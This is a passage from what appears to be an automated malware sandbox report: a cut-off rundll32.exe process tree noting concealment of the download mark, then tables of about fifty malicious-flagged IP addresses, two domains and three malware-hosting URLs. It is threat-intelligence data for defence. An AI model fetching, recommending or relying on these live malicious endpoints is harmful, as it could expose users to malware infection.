the sample has been downloaded from the Internet (zone.identifier) 32->61 36 rundll32.exe 32->36         started        signatures17 process18 process19 38 rundll32.exe 1 36->38         started        signatures20 71 Hides that the sample has been downloaded from the Internet (zone.identifier) 38->71 41 rundll32.exe 38->41         started        process21
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
195.154.133.20
 unknown France
12876 OnlineSASFR true
185.157.82.211
 unknown Poland
42927 S-NET-ASPL true
212.237.17.99
 unknown Italy
31034 ARUBA-ASNIT true
79.172.212.216
 unknown Hungary
61998 SZERVERPLEXHU true
110.232.117.186
 unknown Australia
56038 RACKCORP-APRackCorpAU true
173.214.173.220
 unknown United States
19318 IS-AS-1US true
212.24.98.99
 unknown Lithuania
62282 RACKRAYUABRakrejusLT true
138.185.72.26
 unknown Brazil
264343 EmpasoftLtdaMeBR true
178.63.25.185
 unknown Germany
24940 HETZNER-ASDE true
160.16.102.168
 unknown Japan 9370 SAKURA-BSAKURAInternetIncJP true
81.0.236.90
 unknown Czech Republic
15685 CASABLANCA-ASInternetCollocationProviderCZ true
103.75.201.2
 unknown Thailand
133496 CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTH true
216.158.226.206
 unknown United States
19318 IS-AS-1US true
45.118.115.99
 unknown Indonesia
131717 IDNIC-CIFO-AS-IDPTCitraJelajahInformatikaID true
51.15.4.22
 unknown France
12876 OnlineSASFR true
159.89.230.105
 unknown United States
14061 DIGITALOCEAN-ASNUS true
162.214.50.39
 unknown United States
46606 UNIFIEDLAYER-AS-1US true
103.206.244.105
 jurnalpjf.lan.go.id Indonesia
131111 CEPATNET-AS-IDPTMoraTelematikaIndonesiaID false
200.17.134.35
 unknown Brazil
1916 AssociacaoRedeNacionaldeEnsinoePesquisaBR true
217.182.143.207
 unknown France
16276 OVHFR true
107.182.225.142
 unknown United States
32780 HOSTINGSERVICES-INCUS true
51.38.71.0
 unknown France
16276 OVHFR true
45.118.135.203
 unknown Japan 63949 LINODE-APLinodeLLCUS true
50.116.54.215
 unknown United States
63949 LINODE-APLinodeLLCUS true
131.100.24.231
 unknown Brazil
61635 GOPLEXTELECOMUNICACOESEINTERNETLTDA-MEBR true
46.55.222.11
 unknown Bulgaria
34841 BALCHIKNETBG true
41.76.108.46
 unknown South Africa
327979 DIAMATRIXZA true
173.212.193.249
 unknown Germany
51167 CONTABODE true
45.176.232.124
 unknown Colombia
267869 CABLEYTELECOMUNICACIONESDECOLOMBIASASCABLETELCOC true
178.79.147.66
 unknown United Kingdom
63949 LINODE-APLinodeLLCUS true
212.237.5.209
 unknown Italy
31034 ARUBA-ASNIT true
162.243.175.63
 unknown United States
14061 DIGITALOCEAN-ASNUS true
176.104.106.96
 unknown Serbia
198371 NINETRS true
207.38.84.195
 unknown United States
30083 AS-30083-GO-DADDY-COM-LLCUS true
164.68.99.3
 unknown Germany
51167 CONTABODE true
164.90.147.135
 hostfeeling.com United States
14061 DIGITALOCEAN-ASNUS true
192.254.71.210
 unknown United States
64235 BIGBRAINUS true
212.237.56.116
 unknown Italy
31034 ARUBA-ASNIT true
104.168.155.129
 unknown United States
54290 HOSTWINDSUS true
45.142.114.231
 unknown Germany
44066 DE-FIRSTCOLOwwwfirst-colonetDE true
203.114.109.124
 unknown Thailand
131293 TOT-LLI-AS-APTOTPublicCompanyLimitedTH true
209.59.138.75
 unknown United States
32244 LIQUIDWEBUS true
159.8.59.82
 unknown United States
36351 SOFTLAYERUS true
129.232.188.93
 unknown South Africa
37153 xneeloZA true
91.240.118.172
 unknown unknown
49453 GLOBALLAYERNL true
58.227.42.236
 unknown Korea Republic of
9318 SKB-ASSKBroadbandCoLtdKR true
158.69.222.101
 unknown Canada
16276 OVHFR true
104.251.214.46
 unknown United States
54540 INCERO-HVVCUS true

Contacted Domains

Name IP Active
hostfeeling.com 164.90.147.135 true
jurnalpjf.lan.go.id 103.206.244.105 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://91.240.118.172/gg/ff/fe.png true
  • Avira URL Cloud: malware
 unknown
http://jurnalpjf.lan.go.id/assets/iM/ true
  • Avira URL Cloud: malware
 unknown
http://91.240.118.172/gg/ff/fe.html true
  • Avira URL Cloud: malware
 unknown